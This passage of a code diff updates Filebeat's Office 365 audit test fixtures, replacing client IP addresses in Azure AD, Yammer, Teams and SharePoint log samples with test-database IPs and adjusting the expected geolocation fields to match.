"tags": [ "forwarded" ], @@ -6357,8 +6252,8 @@ }, { "@timestamp": "2020-02-07T16:44:03.000Z", - "client.address": "213.97.47.133", - "client.ip": "213.97.47.133", + "client.address": "81.2.69.143", + "client.ip": "81.2.69.143", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -6376,7 +6271,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 91967, + "log.offset": 91851, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -6393,10 +6288,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "213.97.47.133", + "o365.audit.ActorIpAddress": "81.2.69.143", "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "213.97.47.133", + "o365.audit.ClientIP": "81.2.69.143", "o365.audit.CreationTime": "2020-02-07T16:44:03", "o365.audit.ExtendedProperties.KeepMeSignedIn": "True", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", @@ -6425,20 +6320,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "213.97.47.133", + "related.ip": "81.2.69.143", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "213.97.47.133", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "tags": [ "forwarded" ], @@ -6456,8 +6349,8 @@ }, { "@timestamp": "2020-02-09T15:29:02.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", 
@@ -6475,7 +6368,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 93417, + "log.offset": 93297, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -6492,10 +6385,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-09T15:29:02", "o365.audit.ExtendedProperties.KeepMeSignedIn": "True", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", @@ -6524,20 +6417,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], 
@@ -6555,8 +6446,8 @@ }, { "@timestamp": "2020-02-09T15:25:21.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -6574,7 +6465,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 94867, + "log.offset": 94745, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -6591,10 +6482,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-09T15:25:21", "o365.audit.ExtendedProperties.KeepMeSignedIn": "True", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", 
@@ -6623,20 +6514,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -6654,8 +6543,8 @@ }, { "@timestamp": "2020-02-07T16:43:39.000Z", - "client.address": "213.97.47.133", - "client.ip": "213.97.47.133", + "client.address": "81.2.69.143", + "client.ip": "81.2.69.143", "event.action": "UserLoggedIn", "event.category": "authentication", "event.code": "AzureActiveDirectoryStsLogon", @@ -6673,7 +6562,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 96317, + "log.offset": 96193, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -6690,10 +6579,10 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "213.97.47.133", + "o365.audit.ActorIpAddress": "81.2.69.143", "o365.audit.ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "213.97.47.133", + "o365.audit.ClientIP": "81.2.69.143", "o365.audit.CreationTime": "2020-02-07T16:43:39", "o365.audit.ExtendedProperties.KeepMeSignedIn": "True", "o365.audit.ExtendedProperties.RequestType": "OAuth2:Authorize", @@ -6722,20 +6611,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "213.97.47.133", + "related.ip": "81.2.69.143", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", + "source.geo.city_name": "London", "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "213.97.47.133", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5142, + "source.geo.location.lon": -0.0931, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "81.2.69.143", "tags": [ "forwarded" ], diff --git a/x-pack/filebeat/module/o365/audit/test/22-yammer.log b/x-pack/filebeat/module/o365/audit/test/22-yammer.log index 1c2fa3766b2b..08cad6005f49 100644 --- a/x-pack/filebeat/module/o365/audit/test/22-yammer.log +++ b/x-pack/filebeat/module/o365/audit/test/22-yammer.log 
@@ -1,2 +1,2 @@ -{"ObjectId":"Sales","Id":"2af7bbf1-d5d8-5cb0-8aca-f4ad8a087594","CreationTime":"2020-02-28T09:42:45","UserKey":"100320009d6edf94","YammerNetworkId":5846122497,"Operation":"GroupCreation","ClientIP":"79.159.10.151:12345","ActorYammerUserId":36787265537,"UserType":0,"ResultStatus":"TRUE","RecordType":22,"Workload":"Yammer","Version":1,"GroupName":"Sales","OrganizationId":"0e1dddce-163e-4b0b-9e33-87ba56ac4655","UserId":"alice@testsiem2.onmicrosoft.com","ActorUserId":"alice@testsiem2.onmicrosoft.com"} +{"ObjectId":"Sales","Id":"2af7bbf1-d5d8-5cb0-8aca-f4ad8a087594","CreationTime":"2020-02-28T09:42:45","UserKey":"100320009d6edf94","YammerNetworkId":5846122497,"Operation":"GroupCreation","ClientIP":"216.160.83.57:12345","ActorYammerUserId":36787265537,"UserType":0,"ResultStatus":"TRUE","RecordType":22,"Workload":"Yammer","Version":1,"GroupName":"Sales","OrganizationId":"0e1dddce-163e-4b0b-9e33-87ba56ac4655","UserId":"alice@testsiem2.onmicrosoft.com","ActorUserId":"alice@testsiem2.onmicrosoft.com"} {"CreationTime":"2020-02-28T09:39:20","ActorUserId":"asr@testsiem2.onmicrosoft.com","ObjectId":"Company group","UserKey":"100320009d292e16","Id":"3f3e7f1c-84c1-55fc-9bb2-c8b8563eae06","ActorYammerUserId":36085768193,"ClientIP":"[fdfd::555]:12346","UserId":"asr@testsiem2.onmicrosoft.com","Operation":"GroupCreation","ResultStatus":"TRUE","UserType":0,"Workload":"Yammer","Version":1,"OrganizationId":"0e1dddce-163e-4b0b-9e33-87ba56ac4655","YammerNetworkId":5846122497,"RecordType":22,"GroupName":"Company group"} diff --git a/x-pack/filebeat/module/o365/audit/test/22-yammer.log-expected.json b/x-pack/filebeat/module/o365/audit/test/22-yammer.log-expected.json index 9766954cc626..1521e2901399 100644 --- a/x-pack/filebeat/module/o365/audit/test/22-yammer.log-expected.json +++ b/x-pack/filebeat/module/o365/audit/test/22-yammer.log-expected.json 
@@ -1,8 +1,8 @@ [ { "@timestamp": "2020-02-28T09:42:45.000Z", - "client.address": "79.159.10.151:12345", - "client.ip": "79.159.10.151", + "client.address": "216.160.83.57:12345", + "client.ip": "216.160.83.57", "client.port": 12345, "event.action": "GroupCreation", "event.category": "iam", @@ -25,7 +25,7 @@ "network.type": "ipv4", "o365.audit.ActorUserId": "alice@testsiem2.onmicrosoft.com", "o365.audit.ActorYammerUserId": 36787265537, - "o365.audit.ClientIP": "79.159.10.151:12345", + "o365.audit.ClientIP": "216.160.83.57:12345", "o365.audit.CreationTime": "2020-02-28T09:42:45", "o365.audit.GroupName": "Sales", "o365.audit.Id": "2af7bbf1-d5d8-5cb0-8aca-f4ad8a087594", @@ -41,19 +41,18 @@ "o365.audit.Workload": "Yammer", "o365.audit.YammerNetworkId": 5846122497, "organization.id": "0e1dddce-163e-4b0b-9e33-87ba56ac4655", - "related.ip": "79.159.10.151", + "related.ip": "216.160.83.57", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "79.159.10.151", + "source.as.number": 209, + "source.geo.city_name": "Milton", + "source.geo.continent_name": "North America", + "source.geo.country_iso_code": "US", + "source.geo.country_name": "United States", + "source.geo.location.lat": 47.2513, + "source.geo.location.lon": -122.3149, + "source.geo.region_iso_code": "US-WA", + "source.geo.region_name": "Washington", + "source.ip": "216.160.83.57", "source.port": 12345, "tags": [ "forwarded" diff --git a/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log b/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log index 525915630781..d612f1ccc9d7 100644 
--- a/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log +++ b/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log 
@@ -1,49 +1,49 @@ {"CreationTime":"2021-02-05T09:08:00","Id":"9b9e973b-64c3-4607-bc79-bf743c985051","Operation":"TeamCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":25,"UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":2,"Version":1,"Workload":"MicrosoftTeams","UserId":"root@testsiem4.onmicrosoft.com","TeamGuid":"19:5b5e23f8af084c2188311d38cd51ac0f@thread.tacv2","TeamName":"users"} {"CreationTime":"2021-02-05T09:07:58","Id":"f16cc0cc-2a18-580e-83c5-04d3c385ebb8","Operation":"MemberAdded","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":25,"UserKey":"21119711-1517-43d4-8138-b537dafad016","UserType":0,"Version":1,"Workload":"MicrosoftTeams","UserId":"root@testsiem4.onmicrosoft.com","AADGroupId":"61b6d6f5-7aa0-437b-a967-fbcd39ec90a1","CommunicationType":"Team","Members":[{"DisplayName":"Adrian Serrano","Role":2,"UPN":"admin@testsiem4.onmicrosoft.com"},{"DisplayName":"Eve","Role":2,"UPN":"eve@testsiem4.onmicrosoft.com"}],"TeamGuid":"19:5b5e23f8af084c2188311d38cd51ac0f@thread.tacv2","ItemName":"users","TeamName":"users"} -{"CreationTime":"2021-02-05T09:08:13","Id":"6454a7d9-afae-4a6c-ffa5-08d8c9b5911c","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"52.114.88.180","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/28cf69c5-fa48-462a-b5cd-27b6f9d2bd5f","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams 
Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-5054-2000-9ced-83aa1cf560fd","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} -{"CreationTime":"2021-02-05T09:08:12","Id":"6d69552c-2019-4f7c-92bc-08d8c9b5908b","Operation":"FolderCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":6,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"52.114.88.180","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/Shared Documents\/General","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-b01b-2000-9ced-879789d2d8e5","EventSource":"SharePoint","ItemType":"Folder","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","ListItemUniqueId":"81d4cd08-7ffb-45d2-a422-86a9a9335d66","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","SourceFileExtension":"","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/","SourceFileName":"General","SourceRelativeUrl":"Shared Documents"} 
+{"CreationTime":"2021-02-05T09:08:13","Id":"6454a7d9-afae-4a6c-ffa5-08d8c9b5911c","Operation":"ListColumnUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":56,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"81.2.69.143","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/66afcf95-7cd2-4b68-a3e8-3383d908b8f2\/28cf69c5-fa48-462a-b5cd-27b6f9d2bd5f","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-5054-2000-9ced-83aa1cf560fd","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"Field","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":1,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2"} +{"CreationTime":"2021-02-05T09:08:12","Id":"6d69552c-2019-4f7c-92bc-08d8c9b5908b","Operation":"FolderCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":6,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"81.2.69.143","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/Shared Documents\/General","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams 
Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-b01b-2000-9ced-879789d2d8e5","EventSource":"SharePoint","ItemType":"Folder","ListId":"66afcf95-7cd2-4b68-a3e8-3383d908b8f2","ListItemUniqueId":"81d4cd08-7ffb-45d2-a422-86a9a9335d66","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","SourceFileExtension":"","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/","SourceFileName":"General","SourceRelativeUrl":"Shared Documents"} {"CreationTime":"2021-02-05T09:07:57","Id":"6e9fc7e0-158a-4456-2a89-08d8c9b58771","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Members<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"Everyone except external users"} {"CreationTime":"2021-02-05T09:07:56","Id":"a9b8277d-d3b9-4d99-0491-08d8c9b5874b","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site 
Owners<\/Group>","TargetUserOrGroupType":"Member","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"SHAREPOINT\\system"} {"CreationTime":"2021-02-05T09:07:56","Id":"dfef0880-e895-47e1-2e39-08d8c9b58733","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"users Owners"} {"CreationTime":"2021-02-05T09:07:56","Id":"d9b6f410-30c7-42a0-0820-08d8c9b5872c","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Members<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"users Members"} 
{"CreationTime":"2021-02-05T09:07:56","Id":"5c82c14e-525e-44f4-7cd7-08d8c9b58722","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"Member","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"SHAREPOINT\\system"} -{"CreationTime":"2021-02-05T09:07:56","Id":"f576a30e-1734-4f42-f3b3-08d8c9b58718","Operation":"SiteCollectionCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":4,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"20.190.143.50","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","ApplicationDisplayName":"Microsoft Graph","ApplicationId":"00000006-0000-0ff1-ce00-000000000000","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Site","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","EventData":"O365AdminCenter<\/SiteCreationSource>True<\/TenantSettings.ShowCreateSiteCommand>False<\/TenantSettings.UseCustomSiteCreationForm>"} 
+{"CreationTime":"2021-02-05T09:07:56","Id":"f576a30e-1734-4f42-f3b3-08d8c9b58718","Operation":"SiteCollectionCreated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":4,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"81.2.69.193","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","ApplicationDisplayName":"Microsoft Graph","ApplicationId":"00000006-0000-0ff1-ce00-000000000000","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Site","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","EventData":"O365AdminCenter<\/SiteCreationSource>True<\/TenantSettings.ShowCreateSiteCommand>False<\/TenantSettings.UseCustomSiteCreationForm>"} {"CreationTime":"2021-02-05T09:07:56","Id":"f84f38b0-1963-4a1d-454e-08d8c9b586e9","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"SecurityGroup","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"users Owners"} 
{"CreationTime":"2021-02-05T09:07:55","Id":"e85ec350-af23-47a7-5b33-08d8c9b586be","Operation":"AddedToGroup","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":14,"UserKey":"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users","UserId":"app@sharepoint","CorrelationId":"4eb429d5-cf62-4a12-a3f6-526628c81d78","EventSource":"SharePoint","ItemType":"Web","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","EventData":"Site Owners<\/Group>","TargetUserOrGroupType":"Member","SiteUrl":"https:\/\/testsiem4.sharepoint.com\/sites\/users","TargetUserOrGroupName":"SHAREPOINT\\system"} -{"CreationTime":"2021-02-05T09:08:14","Id":"32474de1-fca7-4d81-4f97-08d8c9b591a4","Operation":"ListUpdated","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":36,"UserKey":"i:0h.f|membership|1003200112eb07e6@live.com","UserType":0,"Version":1,"Workload":"SharePoint","ClientIP":"52.114.88.180","ObjectId":"https:\/\/testsiem4.sharepoint.com\/sites\/users\/96cdfc22-2b86-49ea-b4e9-f11888b1665d","UserId":"root@testsiem4.onmicrosoft.com","ApplicationDisplayName":"Microsoft Teams Services","ApplicationId":"cc15fd57-2c6c-4117-a88c-83b1d56b4bbe","CorrelationId":"fc39a89f-4077-2000-7abb-cbd546e4157d","DoNotDistributeEvent":true,"EventSource":"SharePoint","ItemType":"List","ListId":"96cdfc22-2b86-49ea-b4e9-f11888b1665d","Site":"457ebd3e-0d71-454f-a4d4-2f552991d13c","UserAgent":"SkypeSpaces\/1.0a$*+","WebId":"3b387d63-522a-4745-bcc8-4107d92b8840","FromApp":false,"IsDocLib":true,"ItemCount":0,"ListBaseTemplateType":"101","ListBaseType":"DocumentLibrary","ListColor":"","ListIcon":"","TemplateTypeId":"","ListTitle":"96cdfc22-2b86-49ea-b4e9-f11888b1665d"} 
